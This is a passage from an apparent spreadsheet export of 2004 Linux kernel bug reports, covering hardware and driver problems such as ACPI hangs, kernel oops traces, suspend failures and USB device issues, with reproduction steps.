    <t>Distribution: nanoLinux (similar to Debian testing) Hardware Environment: i386, system running from CD-ROM live Software Environment: Problem Description: when accessing a CD-ROM with zisofs extentions (transparent compression available with Linux kernel), some files cannot be read. The first read on such files is complete, but it ends with an I/O error; the second read on the same files is complete, but it does not end (like the program is just whaiting for the end of file), and there is no way to kill it. Steps to reproduce: with kernel 2.6.8.1: 1. make a zisofs tree 2. burn a CD 3. mount it with transparent decompression 4. try to copy it all inside a temporary directory, like: # cp -dpR /mnt/sr1 /tmp Thank you for your attention. daniele giacomini daniele (ad) swlibero . org</t>
  </si>
  <si>
    <t>call of _INI on _VGA device in acpi_ns_init_one_device never returns on nx9005</t>
  </si>
  <si>
    <t>2004-10-04 05:29 UTC</t>
  </si>
  <si>
    <t>Christian Schmidt</t>
  </si>
  <si>
    <t>2004-11-20 03:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: HP/Compaq nx9005 Software Environment: Linux kernel 2.6.7, 2.6.8, 2.6.8.1 Problem Description: Bootup with ACPI enabled fails as the _INI function of the _VGA device called during ACPI init never returns. Steps to reproduce: (try to) boot.</t>
  </si>
  <si>
    <t>NULL pointer dereference whilst bringing up loopback device.</t>
  </si>
  <si>
    <t>2004-10-04 06:21 UTC</t>
  </si>
  <si>
    <t>Alan Woodland</t>
  </si>
  <si>
    <t>2004-11-09 18:18 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux (pure64) Hardware Environment: AMD64 (Abit kv8-pro) Problem Description: Everytime anything tries to bring my loopback device up I get the following message eth0: no IPv6 routers present Disabled Privacy Extensions on device ffffffff803422c0(lo) devfs_mk_dev: could not append to parent for sound/audio Unable to handle kernel NULL pointer dereference at 0000000000000148 RIP: &lt;ffffffffa00a1b8b&gt;{:via_velocity:velocity_netdev_event+27} PML4 3df15067 PGD 35aa0067 PMD 0 Oops: 0000 [1] CPU 0 Modules linked in: snd_pcm_oss snd_mixer_oss nvidia ipv6 af_packet tsdev mousede v joydev usbhid uhci_hcd evdev ehci_hcd via82cxxx_audio uart401 sound ac97_codec sata_via libata scsi_mod capabi lity commoncap snd_ioctl32 snd_via82xx snd_ac97_codec snd_pcm snd_timer snd_page _alloc gameport snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore via_velocity ide_cd cdr om genrtc ext3 j bd mbcache ide_generic via82cxxx ide_disk ide_core unix font vesafb cfbcopyarea cfbimgblt cfbfil lrect Pid: 2819, comm: ifconfig Tainted: P 2.6.8-3-amd64-k8 RIP: 0010:[&lt;ffffffffa00a1b8b&gt;] &lt;ffffffffa00a1b8b&gt;{:via_velocity:velocity_netdev_ event+27} RSP: 0018:000001003545ddf8 EFLAGS: 00010206 RAX: 0000000000000000 RBX: ffffffffa00a5710 RCX: 00000000000007cf RDX: 000001003f5ae0c0 RSI: 0000000000000001 RDI: ffffffffa00a5710 RBP: 000001003d856e00 R08: 0000000000000000 R09: 0000000000000003 R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000001 R13: 000001003545de98 R14: 0000000000008916 R15: 0000000000000000 FS: 000000000090f090(0000) GS:ffffffff803c1400(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000148 CR3: 0000000000101000 CR4: 00000000000006e0 Process ifconfig (pid: 2819, threadinfo 000001003545c000, task 0000010035a542f0) Stack: ffffffff8034bef0 ffffffff8013e9ff 000001003d856e00 000001003df87810 000001003df87800 ffffffff8026f932 000001003d856e00 000001003545de88 00000000ffffff97 ffffffff80270207 Call Trace:&lt;ffffffff8013e9ff&gt;{notifier_call_chain+31} &lt;ffffffff8026f932&gt;{inet_in sert_ifa+370} &lt;ffffffff80270207&gt;{devinet_ioctl+1015} &lt;ffffffff80272127&gt;{inet_ioctl+87} &lt;ffffffff8022a7a8&gt;{sock_ioctl+584} &lt;ffffffff8017a9cb&gt;{sys_ioctl+507} &lt;ffffffff80111e69&gt;{error_exit+0} &lt;ffffffff8011162a&gt;{system_call+126} Code: 48 8b 80 48 01 00 00 48 85 c0 74 1e 48 8b 40 10 48 85 c0 74 RIP &lt;ffffffffa00a1b8b&gt;{:via_velocity:velocity_netdev_event+27} RSP &lt;000001003545 ddf8&gt; CR2: 0000000000000148 Steps to reproduce: This seems to occur everytime I (or an init script) tries to bring lo up Alan</t>
  </si>
  <si>
    <t>cdu31a - Oops when mounting a CD</t>
  </si>
  <si>
    <t>2004-10-06 09:40 UTC</t>
  </si>
  <si>
    <t>Ondrej Zary</t>
  </si>
  <si>
    <t>2004-10-15 03:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0, vanilla kernel 2.6.8.1 Hardware Environment: i430TX-based board, Cyrix MII CPU, SONY CDU33A drive with COR334 controller (configured to 0x320, no DMA, no IRQ), 3c509 at 0x300, CMI8329A-based sound card Software Environment: Problem Description: Module cdu31a loads OK. When I try to mount a CD, the drive LED blinks, CD starts spinning and Oops. Steps to reproduce: root@pentium:~# modprobe cdu31a cdu31a_port=0x320 root@pentium:~# mount /dev/cdu31a /mnt/cdrom The drive and controller seem to be OK (work in Windows). The interesting thing: there's "Trying session 2" in the log, but I've tried single-session CDs (maybe it has to do something with CD-MRW detection?) Should I post something more (like .config)? Relevant part of syslog: Oct 5 21:48:31 pentium kernel: cdu31a: Trying session 1 Oct 5 21:48:32 pentium kernel: cdu31a: Trying session 2 Oct 5 21:48:36 pentium kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Oct 5 21:48:36 pentium kernel: printing eip: Oct 5 21:48:36 pentium kernel: 00000000 Oct 5 21:48:36 pentium kernel: *pde = 00000000 Oct 5 21:48:36 pentium kernel: Oops: 0000 [#1] Oct 5 21:48:36 pentium kernel: PREEMPT Oct 5 21:48:36 pentium kernel: Modules linked in: cdu31a 3c509 snd_sb16 snd_opl3_lib snd_hwdep snd_sb16_dsp snd_sb_common Oct 5 21:48:36 pentium kernel: CPU: 0 Oct 5 21:48:36 pentium kernel: EIP: 0060:[&lt;00000000&gt;] Not tainted Oct 5 21:48:36 pentium kernel: EFLAGS: 00010246 (2.6.8.1) Oct 5 21:48:36 pentium kernel: EIP is at 0x0 Oct 5 21:48:36 pentium kernel: eax: c904a5a0 ebx: c397cccc ecx: c904a560 edx: c397cccc Oct 5 21:48:36 pentium kernel: esi: c904a5a0 edi: c397cd10 ebp: c395adc4 esp: c397ccb4 Oct 5 21:48:36 pentium kernel: ds: 007b es: 007b ss: 0068 Oct 5 21:48:36 pentium kernel: Process mount (pid: 1458, threadinfo=c397c000 task=c138a660) Oct 5 21:48:36 pentium kernel: Stack: c0242934 00000002 00000000 00000000 00000000 00000000 28000046 00000000 Oct 5 21:48:36 pentium kernel: 00000010 c397ccbc 00000010 00000000 00000000 00000002 00000001 00001388 Oct 5 21:48:36 pentium kernel: 00000000 00000000 c904a5a0 00000000 00000001 c0242ec7 00000000 00000000 Oct 5 21:48:36 pentium kernel: Call Trace: Oct 5 21:48:36 pentium kernel: [&lt;c0242934&gt;] cdrom_is_mrw+0x44/0x80 Oct 5 21:48:36 pentium kernel: [&lt;c0242ec7&gt;] cdrom_open_write+0x17/0x140 Oct 5 21:48:36 pentium kernel: [&lt;c024308e&gt;] cdrom_open+0x8e/0xd0 Oct 5 21:48:36 pentium kernel: [&lt;c014ac1e&gt;] do_open+0x13e/0x410 Oct 5 21:48:36 pentium kernel: [&lt;c014af54&gt;] blkdev_get+0x64/0x70 Oct 5 21:48:36 pentium kernel: [&lt;c014b2da&gt;] open_bdev_excl+0x3a/0x80 Oct 5 21:48:36 pentium kernel: [&lt;c0149c44&gt;] get_sb_bdev+0x14/0x110 Oct 5 21:48:36 pentium kernel: [&lt;c0196fde&gt;] msdos_get_sb+0xe/0x20 Oct 5 21:48:36 pentium kernel: [&lt;c0196fa0&gt;] msdos_fill_super+0x0/0x30 Oct 5 21:48:36 pentium kernel: [&lt;c0149eac&gt;] do_kern_mount+0x3c/0xc0 Oct 5 21:48:36 pentium kernel: [&lt;c015dd59&gt;] do_new_mount+0x69/0xa0 Oct 5 21:48:36 pentium kernel: [&lt;c015e3a7&gt;] do_mount+0x137/0x190 Oct 5 21:48:36 pentium kernel: [&lt;c012cf5c&gt;] __alloc_pages+0x2cc/0x310 Oct 5 21:48:36 pentium kernel: [&lt;c01be039&gt;] copy_from_user+0x29/0x50 Oct 5 21:48:36 pentium kernel: [&lt;c015e74c&gt;] sys_mount+0x8c/0x100 Oct 5 21:48:36 pentium kernel: [&lt;c0103c77&gt;] syscall_call+0x7/0xb Oct 5 21:48:36 pentium kernel: Code: Bad EIP value.</t>
  </si>
  <si>
    <t>disable event LID blocks SLPB and vice versa on wakeup from S3</t>
  </si>
  <si>
    <t>2.6.9-rc3, 2.6.9-rc3-bk6, 2.6.9-rc3-mm2</t>
  </si>
  <si>
    <t>2004-10-07 06:39 UTC</t>
  </si>
  <si>
    <t>Pawel Maziarz</t>
  </si>
  <si>
    <t>2005-01-26 23:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: Notebook Aristo 2500, CPU Celeron 2.40Ghz Problem Description: When i go into S3 mode (echo mem &gt;/sys/power/state), i can wakeup by pressing SLPB (Fn+ESC on my laptop) or opening LID. When i do that on a working system, kernel sends events "button/sleep SLPB 00000080 00000000x" when i'm pressing Fn+ESC and "button/lid LID 000000080 00000000x" when i'm openning or closing LID. But, when i disable LID (echo LID &gt;/proc/acpi/wakeup) *or* SLPB (echo SLPB &gt;/proc/acpi/wakeup), i do cat /proc/acpi/wakeup and i see that LID or SLPB is disabled, i can't go back from S3 state. Steps to reproduce: echo LID &gt;/proc/acpi/wakeup or echo SLPB &gt;/proc/acpi/wakeup and echo mem &gt;/sys/power/state</t>
  </si>
  <si>
    <t>(sata sii) mod15 quirk with Seagate ST3120026AS</t>
  </si>
  <si>
    <t>2.6.8 - 2.6.9-rc3</t>
  </si>
  <si>
    <t>2004-10-07 07:06 UTC</t>
  </si>
  <si>
    <t>Stuart Coyle</t>
  </si>
  <si>
    <t>2005-08-31 02:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: AMD64, sil3512 controller on m/b. Harddrive: Seagate 120GB ST3120026AS Problem Description: Drive would lock when writing large files, eg video from firewire, audio editing. Checked dmesg, was obviously the sata drive. Have added the drive to the blacklist in sata_sil.c and the problem seems to have disappeared. Is there a good test to verify that the mod15 bug is really the problem? --- linux-2.6.9-rc3-bk7/drivers/scsi/sata_sil.c 2004-10-07 22:41:16.000000000 +1000 +++ linux/drivers/scsi/sata_sil.c 2004-10-07 23:32:14.024541776 +1000 @@ -87,6 +87,7 @@ { "ST380023AS", SIL_QUIRK_MOD15WRITE }, { "ST3120023AS", SIL_QUIRK_MOD15WRITE }, { "ST3160023AS", SIL_QUIRK_MOD15WRITE }, + { "ST3120026AS", SIL_QUIRK_MOD15WRITE }, { "ST340014ASL", SIL_QUIRK_MOD15WRITE }, { "ST360014ASL", SIL_QUIRK_MOD15WRITE }, { "ST380011ASL", SIL_QUIRK_MOD15WRITE },</t>
  </si>
  <si>
    <t>2.6.9-rc3-mm3</t>
  </si>
  <si>
    <t>Toshiba Sat Pro A10 fails to resume</t>
  </si>
  <si>
    <t>2.6.8.1 with ACPI 20040816</t>
  </si>
  <si>
    <t>2004-10-08 06:23 UTC</t>
  </si>
  <si>
    <t>2004-10-13 14:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Hardware Environment: Toshiba Sat Pro A10 This bug was reported to Ubuntu at http://bugzilla.ubuntu.com/show_bug.cgi?id=1647 The problem is that when the laptop is suspended with "echo mem &gt; /sys/power/state" it fails to resume. The resume almost works in the sense that everything is brought back to life including X however the system immediately enters a graceful shutdown as if a power-off event was generated.</t>
  </si>
  <si>
    <t>(net 8139too) CardBus NIC locks up system with PIO</t>
  </si>
  <si>
    <t>2004-10-08 06:52 UTC</t>
  </si>
  <si>
    <t>2008-10-05 09:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Hardware Environment: AJP (generic) 979 series laptop This bug was reported to Ubuntu at http://bugzilla.ubuntu.com/show_bug.cgi?id=1927 The symptom is that the system locks up completely during any network activity with CONFIG_8139TOO_PIO. However, 8139too with MMIO works correctly.</t>
  </si>
  <si>
    <t>2.6.8-2.6.9 regression(hang when laptop lid is closed)</t>
  </si>
  <si>
    <t>2.6.9-rc3</t>
  </si>
  <si>
    <t>2004-10-09 00:47 UTC</t>
  </si>
  <si>
    <t>Matt Hargett</t>
  </si>
  <si>
    <t>2007-03-07 22:34 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo 2004.1 Hardware Environment: Dell Inspirion 600m (Pentium-M 1.4ghz, 768meg RAM, latest BIOS A14) Software Environment: linux 2.6.9-rc*, gcc 3.4.2 Problem Description: I have APM and ACPI enabled, the system boots alright, but hard locks when I close the lid to my laptop. The hang always happens. I noticed this happening with 2.6.9-rc* -- 2.6.8 appeared to work fine. Latest version tested is 2.6.9-rc3-bk5. Steps to reproduce: When closing the lid, the screen does not blank at all, and still displays everything while hung. I have to totally turn off the system and cold boot to get the system back.</t>
  </si>
  <si>
    <t>Missing Sleep State object on Thinkpad 600x</t>
  </si>
  <si>
    <t>2004-10-09 08:24 UTC</t>
  </si>
  <si>
    <t>Jesse Stockall</t>
  </si>
  <si>
    <t>2007-03-07 22:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Thinkpad 600x Software Environment: Kernel 2.6.9-rc3, gcc version 3.3.4 20040623 (Gentoo Linux 3.3.4-r1, ssp-3.3.2-2, pie-8.7.6). Problem Description: Using 2.6.9-rc3 I get the following error on boot: ACPI: (supports S0 S1 hwregs-0169: *** Error: Missing Sleep State object hwregs-0208 [46] acpi_get_sleep_type_da: While evaluating sleep_state [\_S3_], bad Sleep object 00000000 type [NULL Object Descriptor] S4 S5) I applied acpi-20040816-26-latest-release.diff.gz With the same results except that I no longer get the debug output, even though CONFIG_ACPI_DEBUG=y acpidmp, dmesg and config from 2.6.9.-rc3 plus acpi patch are attached Thanks Jesse Steps to reproduce:</t>
  </si>
  <si>
    <t>Fran</t>
  </si>
  <si>
    <t>2004-10-10 08:54 UTC</t>
  </si>
  <si>
    <t>Alexander V. Breger</t>
  </si>
  <si>
    <t>2004-10-26 16:36 UTC</t>
  </si>
  <si>
    <t>Distribution: sources from kernel.org Problem Description: I can't build the sgmldocs &amp; other with non-standart output dir. docproc can't find a lot of files. Steps to reproduce:just 'make O=some_dir sgmldocs'.</t>
  </si>
  <si>
    <t>/proc/bus/usb/devices gets corrupted when a USB keyboard is used</t>
  </si>
  <si>
    <t>2.6.7, 2.6.8.1</t>
  </si>
  <si>
    <t>2004-10-10 09:52 UTC</t>
  </si>
  <si>
    <t>Gideon N. Guillen</t>
  </si>
  <si>
    <t>2004-12-02 22:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Athlon XP on MSI KT-400A, using USB keyboard and mouse Software Environment: kernels &gt;= 2.6.7 Problem Description: The first time I upgraded my kernel (using official FC2 kernel) from kernel 2.6.6 to 2.6.8, my computer would freeze at the "Mounting USB filesystem" part. I found out that it freezes on the line where it's grepping the /proc/bus/usb/devices when a USB keyboard is plugged in. Also, when I boot without the USB keyboard and plug it in, if I try to plug-in another USB device that USB device won't be usable at all. This is because /proc/bus/usb/devices becomes unreadable (readable before plugging the USB keyboard). I was able to reproduce it using vanilla 2.6.8.1 kernel, using kernel-2.6.6-i686.config provided with FC2. The freezing part and the unreadable /proc/bus/usb/devices were successfully reproduced. And BTW, the keyboard is a generic, OEM USB keyboard. There were other people who were able to reproduce the same thing on "branded" USB keyboards (Logitech I think) when I made the post on the Fedora Core mailing list. the keyboard I'm using looks a lot like this, and it's probably the same keyboard http://store.greenlaptop.com/ack595u.html Steps to reproduce: Just plug-in a USB keyboard on a system with a kernel with version &gt;= 2.6.7. Not reproducable on 2.6.6 and 2.4.x kernels.</t>
  </si>
  <si>
    <t>Alps touch pad not seen</t>
  </si>
  <si>
    <t>2004-10-10 18:49 UTC</t>
  </si>
  <si>
    <t>2005-12-20 23:34 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse 9.1 64 bit Hardware Environment: Compaq R3140us Software Environment: Problem Description: Compiled the 2.6.9-rc3-mm3 kernel. The Alps touch pad is not seen even though the code from w1.894.telia.com/~u89404340/touchpad/ appears to be added to the tree. Currently have 2.6.8-rc3 with those patches added and the alps touchpad is idenified and loaded correctly. Steps to reproduce: Patch the 2.6.8.1 kernel with 2.6.9-rc3 and then patch with 2.6.9-rc3-mm3. Set psmouse to module compile and install on boot modprobe psmouse after pci has been loaded cat /proc/bus/input/devices alps is shown as generic ps/2 mouse should show as: I: Bus=0011 Vendor=0002 Product=0008 Version=0000 N: Name="AlpsPS/2 ALPS TouchPad" P: Phys=isa0060/serio4/input0 H: Handlers=mouse0 event2 B: EV=f B: KEY=420 30000 670000 0 0 0 0 0 0 0 0 B: REL=3 B: ABS=1000003</t>
  </si>
  <si>
    <t>add option/dmi to disable c2/c3 in processor.c</t>
  </si>
  <si>
    <t>2.6.9rc3</t>
  </si>
  <si>
    <t>2004-10-11 06:02 UTC</t>
  </si>
  <si>
    <t>2008-07-26 00:45 UTC</t>
  </si>
  <si>
    <t>3219 3406</t>
  </si>
  <si>
    <t>Some IBM and Medion laptops crash in C2/C3. It might be a Linux or a BIOS bug, but it needs some workaround. This patch allows disabling c2/c3 and adds a DMI table for it for the IBM T40</t>
  </si>
  <si>
    <t>CPU at 100% when burning audio cds</t>
  </si>
  <si>
    <t>2.6.8, and 2.6.9rc's</t>
  </si>
  <si>
    <t>2004-10-11 06:10 UTC</t>
  </si>
  <si>
    <t>Pedro de Oliveira</t>
  </si>
  <si>
    <t>2006-08-04 12:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo, kernel 2.6.8 Hardware Environment: BENQ cd recorder Software Environment: cdrecord Problem Description: When i burn a audio cd with cdrecord my computer goes to a crawl using 100% of cpu and burning the cd takes like 15minutes on a burner that does 48X burning. Im using IDE burning like dev=ATA:1,0,0. This only happens with cdrecord, and not with cdrdao. Im having this problem since this kernel, with older kernels i didnt had this. I tried some 2.6.9-rc's and the problem is still there. Steps to reproduce: Burn an audio cd with cdrecord</t>
  </si>
  <si>
    <t>disable ACPI timer override on Nvidia  i386</t>
  </si>
  <si>
    <t>2004-10-11 06:13 UTC</t>
  </si>
  <si>
    <t>After some discussion with Nvidia people it turns out all Timer Overrides on Nvidia boards are wrong. They cause random failures with IO-APIC on. According to Nvidia this should also be safe for future chipsets of theirs. x86-64 already has a similar patch queued for 2.6.10pre. On i386 it is more critical however because x86-64 previously turned off the IO-APIC on these boxes. On i386 it depends on the .config</t>
  </si>
  <si>
    <t>S3 no video - HP Pavilion ZE4201</t>
  </si>
  <si>
    <t>2.6.9-rc4</t>
  </si>
  <si>
    <t>2004-10-12 04:46 UTC</t>
  </si>
  <si>
    <t>Bojan Smojver</t>
  </si>
  <si>
    <t>2005-05-10 21:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1/2/3 Hardware Environment: HP Pavillion ZE-4201 Software Environment: See: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=122604 Problem Description: See: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=122604 Steps to reproduce: echo mem &gt; /sys/power/state Notebook suspends to memory. On power up, the LEDs lit up, fans and disk start spinning, but otherwise the notebook is dead. Screen is completely blank. Latest version of the vanilla kernel (apart from Red Hat supplied Fedora kernels mentioned in the original bug report) that I confirmed this behaviour with is 2.6.9-rc4.</t>
  </si>
  <si>
    <t>jazzsonic.c driver compilation</t>
  </si>
  <si>
    <t>2004-10-13 04:55 UTC</t>
  </si>
  <si>
    <t>2004-10-15 10:15 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel 2.4.28 Hardware Environment: MIPS JAZZ Software Environment: Problem Description: It's impossible to compile a jazzsonic.c driver (outdated convantions) Steps to reproduce: Try to compile it.</t>
  </si>
  <si>
    <t>2.6.9-rc3-mm3 builds and boots, but disables my keyboard</t>
  </si>
  <si>
    <t>2004-10-14 08:29 UTC</t>
  </si>
  <si>
    <t>2004-10-14 22:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Test 1 Hardware Environment: AMD 64 laptop Software Environment: Just Booting Problem Description: I build and install the 2.6.9-rc3-mm3 kernel (on my way to getting the 2.6.9-rc3-mm3-VP-T3 kernel to build, which currently does not build) and when I boot Everything looks great except my keyboard is disabled (even the caps-lock light). 2.6.9-rc3 is my regular working kernel, but audio latency is too high. Steps to reproduce: get 2.6.8 kernel patch with 2.6.9-rc3 patch with 2.6.9-rc3-mm3 use .config from current working 2.6.9-rc3 kernel build, install and boot 2.6.9-rc3-mm3 Watch kudzu pop up, but not be able to do anything about it as the keyboard buttons cause no response from within the laptop. Curse the stars for making x86_64 so difficult.</t>
  </si>
  <si>
    <t>2.6.10-rc2</t>
  </si>
  <si>
    <t>(IRDA) PNP Support in nsc-ircc</t>
  </si>
  <si>
    <t>2004-10-15 18:08 UTC</t>
  </si>
  <si>
    <t>2007-11-02 08:45 UTC</t>
  </si>
  <si>
    <t>Since some of the devices this driver supports are PNP-capable, this driver should use the PNP subsystem so that hotplug can load it automatically. See http://bugzilla.ubuntu.com/show_bug.cgi?id=2129 for such a device.</t>
  </si>
  <si>
    <t>Legacy (BSD) ptys broken with kernel 2.6.9</t>
  </si>
  <si>
    <t>2004-10-16 08:14 UTC</t>
  </si>
  <si>
    <t>2005-02-09 13:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0 Hardware Environment: K7 2GHz 512Mo Software Environment: bash 2.04 Problem Description: Several console apps are broken Steps to reproduce: a. Use a kernel with 2.6.9-rc4 configured to use BSD (legacy) Ptys. b. &gt; man man gives : ... See below for a description of where man looks for the manual page files. OPTIONS Error executing formatting or display command. System command /bin/bzip2 -c -d /usr/man/cat1/man.1.bz2 | /usr/bin/less -is exited with status 256. Another example : patch -p0 &lt; file.diff fails with : File to patch: tty read: Is a directory Skip this patch? [y] Skipping patch. 2 out of 2 hunks ignored CC</t>
  </si>
  <si>
    <t>I can't see the bttv support in menuconfig</t>
  </si>
  <si>
    <t>2004-10-17 02:53 UTC</t>
  </si>
  <si>
    <t>mambro</t>
  </si>
  <si>
    <t>2005-04-23 07:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 4 model name : AMD Athlon(tm) Processor stepping : 2 cpu MHz : 952.234 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr syscall mmxext 3dnowext 3dnow bogomips : 1863.68 Software Environment: I use the 2.6.8-gentoo-r3 kernel but there's the same problem on the 2.6.8.1 vanilla Linux terra 2.6.8-gentoo-r3 #4 Fri Oct 15 15:49:47 CEST 2004 i686 AMD Athlon(tm) Processor AuthenticAMD GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.14.90.0.8 util-linux 2.12 mount 2.12 module-init-tools 3.0 e2fsprogs 1.35 xfsprogs 2.6.13 PPP 2.4.1 Linux C Library 2.3.4 Dynamic linker (ldd) 2.3.4 Procps 3.2.3 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded pppoe pppox ppp_generic slhc bttv video_buf i2c_algo_bit v4l2_common btcx_risc i2c_core videodev nls_cp437 vfat fat usbhid usblp usb_storage uhci_hcd snd_pcm_oss snd_mixer_oss snd_via82xx snd_pcm snd_timer snd_ac97_codec snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd nvidia nls_iso8859_15 8139too mii crc32 I think isn't need adding other information for this problem. If you need others one ask me. Problem Description: It's difficult to add the bttv support in the menuconfig. Steps to reproduce: Run make menuconfig Device drivers&gt;Multimedia devices&gt;Video for linux The BT848 video for linux isn't in the list. I need to active Siemens-Nixdorf or Philis Semiconductor or Hexium Hv-PCI6 or Hexium gemini to see it. We have spoke about it in the gentoo forum too http://forums.gentoo.org/viewtopic.php?t=236267&amp;highlight=bttv</t>
  </si>
  <si>
    <t>problem with usb psx pad adaptor</t>
  </si>
  <si>
    <t>2004-10-17 11:54 UTC</t>
  </si>
  <si>
    <t>midall</t>
  </si>
  <si>
    <t>2004-12-29 05:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo x86 stable Hardware Environment: MB Abit nf7-s rev.2.0 Software Environment: hotplug-20040401 Problem Description: I have a unusual problem with psx joypad adaptor usb.... My HW are abit NF7-s 2.0 (nforce2), psx adapter + ps2joypad..., i use kernel 2.6.8.1, (but this problem is in 2.6.7) under gentoo and i have hotplug installed. ok i start my pc and this is the modules load: midallbox root # lsmod Module Size Used by uhci_hcd 32780 0 ohci1394 34628 0 snd_intel8x0 35208 1 snd_ac97_codec 71940 1 snd_intel8x0 snd_pcm 98568 1 snd_intel8x0 snd_timer 26116 1 snd_pcm snd_page_alloc 11848 2 snd_intel8x0,snd_pcm snd_mpu401_uart 8128 1 snd_intel8x0 snd_rawmidi 25892 1 snd_mpu401_uart snd_seq_device 8840 1 snd_rawmidi snd 57700 9 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device soundcore 10336 1 snd ehci_hcd 43908 0 ohci_hcd 33860 0 nvidia_agp 7772 1 agpgart 34216 2 nvidia_agp evdev 9728 0 w83627hf 29188 0 eeprom 8200 0 i2c_sensor 4352 2 w83627hf,eeprom i2c_isa 2048 0 i2c_nforce2 6272 0 i2c_core 26896 5 w83627hf,eeprom,i2c_sensor,i2c_isa,i2c_nforce2 nvidia 4819540 12 sg 38688 0 Ok now moprobe usbhid joydev evdev, and after i connect the psx adapter: tail -f /var/log/messages Aug 23 17:57:13 midallbox kernel: ohci_hcd 0000:00:02.1: wakeup Aug 23 17:57:13 midallbox kernel: usb 2-3: new low speed USB device using address 2 Aug 23 17:57:13 midallbox kernel: usb 2-3: new low speed USB device using address 3 Nothing to do the usb adpter there isn't: lsusb Bus 003 Device 001: ID 0000:0000 Bus 002 Device 001: ID 0000:0000 Bus 001 Device 001: ID 0000:0000 Ok now start my usb printer Canon i475D with include a memory card reader for digital photo machine: tail -f /var/log/messages Aug 23 18:01:44 midallbox kernel: ohci_hcd 0000:00:02.1: wakeup Aug 23 18:01:44 midallbox kernel: usb 2-2: new full speed USB device using address 6 Aug 23 18:01:44 midallbox kernel: hub 2-2:1.0: USB hub found Aug 23 18:01:44 midallbox kernel: hub 2-2:1.0: 3 ports detected Aug 23 18:01:45 midallbox kernel: usb 2-2.1: new full speed USB device using address 7 Aug 23 18:01:45 midallbox kernel: usb 2-2.1: Product: i475D Aug 23 18:01:45 midallbox kernel: usb 2-2.1: Manufacturer: Canon Aug 23 18:01:45 midallbox kernel: usb 2-2.1: SerialNumber: 303QB3 Aug 23 18:01:45 midallbox kernel: drivers/usb/class/usblp.c: usblp0: USB Bidirectional printer dev 7 if 0 alt 0 proto 2 vid 0x04A9 pid 0x108C Aug 23 18:01:45 midallbox kernel: usbcore: registered new driver usblp Aug 23 18:01:45 midallbox kernel: drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver Aug 23 18:01:45 midallbox kernel: usb 2-2.2: new full speed USB device using address 8 Aug 23 18:01:45 midallbox kernel: usb 2-2.2: Product: i475D Storage Aug 23 18:01:45 midallbox kernel: usb 2-2.2: Manufacturer: Canon Aug 23 18:01:45 midallbox kernel: usb 2-2.2: SerialNumber: 333033514233 Aug 23 18:01:45 midallbox kernel: Initializing USB Mass Storage driver... Aug 23 18:01:45 midallbox kernel: scsi1 : SCSI emulation for USB Mass Storage devices Aug 23 18:01:45 midallbox kernel: Vendor: Canon Model: i475DStorage Rev: 0115 Aug 23 18:01:45 midallbox kernel: Type: Direct-Access ANSI SCSI revision: 02 Aug 23 18:01:45 midallbox kernel: Attached scsi removable disk sdb at scsi1, channel 0, id 0, lun 0 Aug 23 18:01:45 midallbox kernel: Attached scsi generic sg1 at scsi1, channel 0, id 0, lun 0, type 0 Aug 23 18:01:45 midallbox kernel: usbcore: registered new driver usb-storage Aug 23 18:01:45 midallbox kernel: USB Mass Storage support registered. Aug 23 18:01:45 midallbox kernel: usb 2-2.3: new full speed USB device using address 9 Aug 23 18:01:45 midallbox kernel: usb 2-2.3: Product: i475D HID Aug 23 18:01:45 midallbox kernel: usb 2-2.3: Manufacturer: Canon Aug 23 18:01:45 midallbox kernel: usb 2-2.3: SerialNumber: 303QB3 Aug 23 18:01:45 midallbox kernel: hiddev96: USB HID v1.10 Device [Canon i475D HID] on usb-0000:00:02.1-2.3 Aug 23 18:01:46 midallbox scsi.agent[7222]: disk at /devices/pci0000:00/0000:00:02.1/usb2/2-2/2-2.2/2-2.2:1.0/host1/1:0:0:0 ok now lsusb: lsusb Bus 003 Device 001: ID 0000:0000 Bus 002 Device 009: ID 04a9:1302 Canon, Inc. Bus 002 Device 008: ID 04a9:1038 Canon, Inc. Bus 002 Device 007: ID 04a9:108c Canon, Inc. Bus 002 Device 006: ID 04a9:1005 Canon, Inc. Bus 002 Device 001: ID 0000:0000 Bus 001 Device 001: ID 0000:0000 and this is the status of modules: lsmod Module Size Used by usb_storage 92208 0 usblp 13056 0 usbhid 35264 0 uhci_hcd 32780 0 ohci1394 34628 0 snd_intel8x0 35208 1 snd_ac97_codec 71940 1 snd_intel8x0 snd_pcm 98568 1 snd_intel8x0 snd_timer 26116 1 snd_pcm 